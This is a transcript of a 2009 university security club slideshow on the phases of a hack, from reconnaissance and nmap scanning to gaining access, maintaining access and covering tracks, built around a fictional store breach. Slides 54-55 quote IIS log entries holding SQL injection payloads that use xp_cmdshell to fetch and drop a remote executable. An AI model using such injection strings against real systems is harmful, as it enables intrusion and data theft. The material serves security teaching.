Anatomy of the Hack - Hands-on Security | Information Assurance Club


Published on

  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Anatomy of the Hack - Hands-on Security | Information Assurance Club

  2. 2. INFORMATION ASSURANCE CLUB Anatomy of a Hack: from 0x00 to root Thursday, October 29st, 2009
  3. 3. ANNOUNCEMENTS  Metasploit Seminar Thursday, November 5th 7:30 PM – 202 IST  iCTF Competition Friday, December 4th  See listserv email or for more information and to sign-up!  Deadline for sign-ups is Friday, November 6th!
  4. 4. ANNOUNCEMENTS  Dean Feedback Session Tuesday, November 3rd 7:00pm to 9:00pm in 110 IST
  5. 5. AGENDA  Background  The Anatomy of the Hack  Reconnaissance  Scanning  Gaining Access  Maintaining Access  Covering Tracks  Application (Interactive)  Conclusion
  6. 6. ESSENTIAL TERMINOLOGY  THREAT – an action or event that might compromise security. A threat is a potential violation of security.  VULNERABILITY – existence of a weakness, design, or implementation error that can lead to an unexpected and undesirable event compromising the security of the system.
  7. 7. ESSENTIAL TERMINOLOGY  ATTACK – an assault on the system security that is derived from an intelligent threat. An attack is any action that violates security.  EXPLOIT – a defined way to breach the security of an IT system through a vulnerability.
  8. 8. HACKER CLASSES  Black hats – individuals with extraordinary computing skills, resorting to malicious or destructive activities. Also known as crackers.  White hats – individuals professing hacker skills and using them for defensive purposes. Also known as security analysts.  Gray Hats – individuals who work both offensively and defensively at various times.  Suicide Hackers – individuals who aim to bring down critical infrastructure for a “cause” (Hactivism) and do not worry about punishment.
  9. 9. QUALITIES OF A HACKER  Should be proficient with programming and computer networking skills  Has in-depth knowledge of target platforms, such as Windows, Unix and Linux  Has exemplary knowledge of networking and related hardware and software  Should be familiar with vulnerability research  Should have mastery in different hacking techniques  In other words, you must be “highly technical” to launch sophisticated attacks  Should be prepared to follow a strict code of conduct (white hats)
  10. 10. HACKERS “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” -Sun Tzu, Art of War  A hacker / security professional answers the following:  What can the intruder see on the target system? (Recon and scanning phases)  What can the intruder do with that information? (Gaining and Maintaining Access)  Does anyone at the target notice the intruders’ attempts or successes (Recon and covering tracks)  Professionals need to know what it is they are trying to protect, against whom, and what resources it is willing to expend in order to gain protection.
  11. 11. THE FIVE PHASES  Reconnaissance  Active  Passive  Scanning  Gaining Access  Denial of Service  Network level  Operating system level / application level  Maintaining Access  Uploading / altering / downloading programs or data  Clearing Tracks 1. Recon 2. Scanning 3. Gaining Access 4. Maintaining Access 5. Clearing Tracks
  12. 12. PHASE 1 - RECONNAISSANCE  Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target prior to launching an attack.  Generally noted as “rattling the door knobs” to see if someone is watching and responding.  Could be the future point of return, noted for ease of entry for an attack when more about the target is known on a broad scale.
  13. 13. RECONNAISSANCE TYPES  Passive reconnaissance involves acquiring information without directly interacting with the target.  Ex: Searching public records or news releases.  Active reconnaissance involves interacting with the target directly by any means.  Ex: Telephone calls to help desk or technical departments.
  14. 14. RECON TECHNIQUES  Social Engineering  Dumpster Diving  Physical Break-ins  Job search sites (job requirements)  Google search / Google hacking  Rich information for passive recon 
  15. 15. FOOTPRINTING  Footprinting is necessary to systematically and methodically ensure that all pieces of information are identified.  Footprinting is often the most difficult task in the hacker methodology.  An attacker spends 90% of the time profiling an organization and another 10% launching the attack.
  16. 16. FOOTPRINTING • Domain Name • Network block • IP addresses of reachable systems • TCP and UDP services running • System architecture • Intrusion Detection Systems • System enumeration (user and group names, system banners, routing tables, SNMP information) Internet • Analog/digital telephone numbers • Remote system types • Authentication mechanisms Remote Access • Network protocols used • Internal domain names • Network blocks • IP addresses of reachable systems • TCP and UDP services running • System architecture • Intrusion Detection Systems • System enumeration Intranet • Connection origination and destination • Type of connection • Access control mechanisms Extranet
  17. 17. FOOTPRINTING TOOLS  Whois, ARIN, nslookup  Traceroutes (Neotrace, VisualRoute Trace)  Guessing internal URLS     Robots.txt
  18. 18. ROBOTS.TXT  Located in the root folder and holds a list of directories and other resources that a site owner does not want indexed.  Hackers usually look here first!  All (most) search engines comply to robots.txt
  19. 19. PHASE 2 - SCANNING  Scanning refers to the pre-attack phase when the hacker scans the network for specific information on the basis of information gathered during reconnaissance.  Hackers have to get a single point of entry to launch an attack.  Scanning can include use of dialers, port scanners, networking mapping, sweeping, vulnerability scanners, etc.
  20. 20. PHASE 2 - SCANNING  Types of scanning:  Port scanning – a series of messages sent to a computer to learn about services.  Network Scanning – a procedure for identifying active hosts on a network.  Vulnerability Scanning – automated process of proactively identifying vulnerabilities of computing systems.
  21. 21. SCANNING PHASES Check for live systems Check for open ports Identify services Banner grabbing OS fingerprinting Scan for vulnerabilities Draw network diagrams of vulnerable hosts Prepare proxies ATTACK!
  22. 22. CHECKING FOR LIVE SYSTEMS  ICMP scanning – find if hosts are running by pinging them all.  ICMP scans can be run parallel so they are very fast.  Tools: Angry IP Scanner, Ping Sweep, Firewalk
  23. 23. CHECKING FOR OPEN PORTS  Use Nmap  Rapidly scans large networks  Port scanning, OS detection, version detection, ping sweep  Scans a large number of machines at one time  Supported by many operating systems  Carry out all types of port scanning techniques
  24. 24. CHECKING FOR OPEN PORTS  Use hping2  Command line oriented TCP/IP packet assembler/analyzer  Has a traceroute mode  Ability to send files between a cover channel  Features  Firewall testing  Advanced port scanning  Network testing, using different protocols, TOS, fragmentation  Advanced traceroutes  Remote OS fingerprinting  Remote uptime guessing  TCP/IP stacks auditing
  25. 25. PORT SCANNING BASICS  The TCP/IP three way handshake  SYN -> SYN/ACK -> ACK  TCP Flags  SYN – initiates request  ACK – establishes connection  PSH – send all buffered data immediately  URG – packet should be processed immediately  FIN – no more transmissions  RST – reset connection
  26. 26. COMMON PORT SCANS  TCP Connect Scan (-sT)  Response is SYN/ACK if open, RST if closed.  SYN Scan (half open scan) (-sS)  SYN -> SYN/ACK -> RST  Fewer sites log this type of scan.  Server responds with RST if port is closed.
  27. 27. COMMON PORT SCANS  Stealth Scanning  Fin Scan (-sF)  Xmas Scan (-sX)  Null Scan (-sN)  Return RST if closed, no response if open.  Called stealth because they send a single frame to a TCP port without handshake.  Windows didn’t follow RFC 793 (Transmission Control Protocol) so it responds with a RST frame for all queries.
  28. 28. COMMON PORT SCANS  Idle Scan (-sI)  Completely blind port scanning! Attackers can actually scan a target without sending a single packet to the target from their own IP address.  Every IP packet has a “fragment identification” number, which is incremented by the stack.  Probing the number can tell an attacker how many packets have been sent since the last probe.  Find a zombie (idle) machine. Spoof packet from zombie, zombie gets SYN/ACK if open and sends RST and increments IPID, gets RST if closed (no increment).
  29. 29. BANNER GRABBING / FINGERPRINTING  Determine the operating system on the target  Active stack fingerprinting  Based on the fact that OS vendors implement the TCP stack differently.  Specially crafted packets are sent to remote OS and the response is noted and compared with a database.  This type of scan is logged.  Passive fingerprinting  Indirect methods; Uses sniffing techniques instead of scanning techniques.  Also based on differential implementation of the stack.  Less accurate.
  30. 30. SCANNING FOR VULNERABILITIES  Nessus – most common tool.  Plugin architecture.  NASL (Nessus attack scripting language).  Can test unlimited hosts simultaneously.  Smart service recognition.  Client–Server architecture.
  31. 31. PREPARING PROXIES  Proxy is a network computer that can serve as an intermediate for connection with other computers.  Purposes:  As a firewall, a proxy protects the local network from outside access.  Acts as an IP address multiplexer, allows a connection from a number of computers having only one IP address.  Anonymous web surfing (to an extent).  Specialized proxies can filter unwanted content, such as ads or “unsuitable” material.
  32. 32. PREPARING PROXIES  A hacker wants to use a proxy to hide their identity.  May use multiple proxies (proxy chains).  Tor  HTTP Tunneling  Allows users to perform various Internet tasks despite restrictions imposed by firewalls.  This is made possible by sending data through HTTP (port 80).
  33. 33. ATTACK!
  34. 34. PHASE 3 – GAINING ACCESS  Gaining access refers to the penetration phase. The hacker exploits the vulnerability in the system.  The exploit can occur over a LAN, the Internet, or as a deception or theft.  Examples include buffer overflows, denial of service, session hijacking, and password cracking.  Influencing factors include architecture and configuration of the target system, the skill level of the attacker, and the initial level of access obtained.  The hacker can gain access at the operating system level, application level, or network level.
  35. 35. ENUMERATION  Enumeration is defined as extraction of user names, machine names, network resources, shares, and services.  Enumeration leads to an attack  Step 1: Enumerate users  Step 2: Crack the password  Step 3: Escalate privileges  Step 4: Execute applications  Can bypass steps depending on the nature of the exploit.
  36. 36. ATTACK SOPHISTICATION US GAO report to Congress, “Computer Attacks at Department of Defense Pose Increasing Risks”, May 1996.
  37. 37. ATTACK SOPHISTICATION CERT - “Information Security as an Institutional Priority” - 2005
  38. 38. HOW TO GAIN ACCESS  There are several ways an attacker can gain access to a system.  The attacker must be able to exploit a weakness or vulnerability in a system. Attack Types: Operating System attacks Application level attacks Shrink wrap code attacks Misconfiguration attacks
  39. 39. OPERATING SYSTEM ATTACKS  Today’s operating systems are complex in nature.  Operating systems run many services, ports, and modes of access and require extensive tweaking to lock them down.  The default installation of most operating systems has large numbers of services running and ports open.  Applying patches and hotfixes are not easy in today’s complex networks.  Attackers look for OS vulnerabilities and exploit them to gain access to a network system. Operating System attacks Application level attacks Shrink wrap code attacks Misconfiguration attacks
  40. 40. APPLICATION LEVEL ATTACKS  Software developers are under tight schedules to deliver products on time.  Extreme Programming is on the rise in software engineering methodology.  Software applications come with tons of functionalities and features.  Sufficient time is not there to perform complete testing before releasing products.  Security is often an afterthought and usually delivered as an “add- on” component.  Poor or non-existent error checking in applications leads to buffer overflow attacks. Operating System attacks Application level attacks Shrink wrap code attacks Misconfiguration attacks
  41. 41. SHRINK WRAP CODE ATTACKS  Why reinvent the wheel when you can buy off- the-shelf libraries and code?  When you install an OS or application, it comes with tons of sample scripts to make the life of an administrator easy.  The problem is “not fine tuning” or customizing these scripts.  This will lead to default code or shrink wrap code attack. Operating System attacks Application level attacks Shrink wrap code attacks Misconfiguration attacks
  42. 42. MISCONFIGURATION ATTACKS  Systems that should be fairly secure are hacked because they were not configured correctly.  Systems are complex and the administrator does not have the necessary skills or resources to fix the problem.  Administrator will create a simple configuration that works.  In order to maximize your chances of configuring a machine correctly, remove any unneeded services or software. Operating System attacks Application level attacks Shrink wrap code attacks Misconfiguration attacks
  43. 43. IMPORTANT RULE  If a hacker wants to get inside your system, they will and there is nothing you can do about it.  The only thing you can do is make it harder for them to get in.  “If you approach a bear with a friend, you don’t have to outrun the bear… just your friend.”
  44. 44. PHASE 4 – MAINTAINING ACCESS  Maintaining access refers to the phase where the hacker tries to retain ownership of the system.  The hacker has compromised the system.  Hackers may harden the system from other hackers as well (to own the system) by securing their exclusive access with backdoors, rootkits, or trojans.  Hackers can upload, download, or manipulate data, applications, and configurations on the owned system.
  45. 45. PHASE 5 – COVERING TRACKS  Covering tracks refers to the activities that the hacker does to hide their actions.  Reasons include the need for prolonged stay, continued use of resources, removing evidence of hacking, or avoid legal action.  Examples include steganography, tunneling, and altering log files.
  46. 46. LOG FILES  Windows logs  SECEVENT.EVT (security)  Failed logins, accessing files without privileges  SYSEVENT.EVT (system)  Driver failure, things not operating correctly  APPEVENT.EVT (applications)  Linux/Unix Logs  UTMP (information about current users)  WTMP (logins and logouts)  LASTLOG (last login)
  47. 47. APPLICATION (INTERACTIVE)  Think like a hacker! Use your background knowledge to figure out how the hacker compromised this fictional company.  Scenario: An online store had their database compromised and customer’s credit card data stolen. The hacker knew nothing initially but the name of the target company.
  48. 48. PHASE 1 - RECONNAISSANCE  What can the hacker learn about the target?  Where should they look for information?
  49. 49. PHASE 1 - RECONNAISSANCE  Hacker learns as much as they can about the company from online resources.  Resolves IP address of the domain name.  WHOIS information is private, no action taken.  Finds job posting for a Windows Administrator with familiarity operating IIS and MSSQL.
  50. 50. PHASE 2 - SCANNING  What should the hacker scan?  What are some tools they could use?
  51. 51. PHASE 2 - SCANNING  The hacker uses nmap to map the network.  Finds only the webserver and a few other hosts in the DMZ. Firewall blocks remote access to internal network.  Hacker fingerprints the webserver.  Running IIS 7.0 and ASP.  Locked down; ports closed and no extra services running.  Scans for vulnerabilities.  Systems are patched.
  53. 53. PHASE 3 - GAINING ACCESS  What might the hacker do now?  What type of attack could they launch?  Operating System  Application  Shrink Wrap  Misconfiguration
  54. 54. PHASE 3 - GAINING ACCESS  The hacker finds a SQL injection vulnerability in a web application.  This is confirmed by looking at the IIS logs: 2009-10-29 05:50:25 W3SVR1 GET /members/profile.asp action=show&id=16705946’ -- 80 - HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en- US;+rv: 500 0 0 2009-10-29 05:55:13 W3SVR1 GET /members/profile.asp action=show&id=16705946' ;exec master..xp_cmdshell 'echo tftp ^&^& echo open ^&^& echo user h@ck3r ^&^& echo uber1337 ^&^& echo get payload.exe ^&^& echo quit%3Eexecute.bat'-- |331|80130e62| Incorrect_syntax_near_the_keyword_'ORDER BY' 80 - HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.8.1. 11)+Gecko/20071127+Firefox/
  55. 55. PHASE 3 - GAINING ACCESS 2009-10-29 06:15:36 W3SVR1 GET /members/profile.asp action=show&id=16705946; exec+master..xp_cmdshell+'echo+1_4D5A90000300000004000000 FFFF0000B800000000000000400000000000000000000000000000000 000000000000000000000000000000000000000E80000000E1FBA0E00 B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742 062652072756E20696E20444F53206D6F64652E0D0D0A240000000000 00002B6F76AB6F0E18F86F0E18F86F0E18F848C865F87A0E18F848C87 6F8490E18F8AC0145F87E0E18F86F0E19F8980E18F848C875F8E70E18 F848C864F86E0E18F848C860F86E0E18F8526963686F0E18F80000000 00000000000000000000000000000000000000000504500004C010300 02884F450000000000000000E0000301>C:windowssystem32srvh ost.exe'-- 80 - HTTP/1.1 Mozilla/5.0+(Win dows;+U;+Windows+NT+5.1;+en-US;+rv: 27+Firefox/ 500 0 0
  56. 56. PHASE 3 - GAINING ACCESS  The hacker has been able to transfer binaries to the web server and execute system commands.  The hacker cannot connect directly to the database server as it is configured to only allow connections from the internal network and the webserver, but once the webserver is compromised the hacker can use it to extract database information.
  57. 57. PHASE 4 - MAINTAINING ACCESS  How can the hacker maintain access to the system?
  58. 58. PHASE 4 - MAINTAINING ACCESS  The hacker can maintain access by installing rootkits or backdoors.  The hacker may also harden the system to prevent SQL injection attacks similar to the ones they used.
  59. 59. PHASE 5 - COVERING TRACKS  The hacker erased firewall and IDS logs as well as the audit logs on the system, but they forgot to edit the IIS connection logs.  What are the consequences of this action, from both the hacker’s and the system administrator’s perspectives?
  60. 60. CONCLUSIONS  Hacking is an art, not a science.  Hackers need only a single point of entry.  You’re only as strong as your weakest link.  Where there’s a will, there’s a way.  Never underestimate a Hacker’s determination.  Security should never be an afterthought.